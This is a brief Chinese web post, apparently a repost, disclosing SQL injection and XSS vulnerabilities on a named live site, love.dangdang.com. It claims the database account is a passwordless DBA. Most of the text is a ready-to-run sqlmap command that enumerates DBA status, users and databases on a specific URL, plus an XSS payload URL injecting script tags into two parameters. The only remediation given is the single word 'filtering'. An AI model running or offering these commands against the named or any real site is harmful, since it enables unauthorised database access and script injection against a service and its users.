love.dangdang.com 一个文艺的页面….然而存在SQL注入和XSS,并且数据库管理账户是dba还没有密码….
SQL注入:sqlmap -u "https://love.dangdang.com/mg.php/main/addintronum?id=59&type=KOL" –is-dba –users –dbs
XSS:https://love.dangdang.com/mg.php/main/addintronum?id=57%3Cscript%3Ealert('xss')%3C/script%3E&type=top%3Cscript%3Ealert('xss1')%3C/script%3E
漏洞解决办法:过滤
—-想了解更多的网站安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/websy/97060.html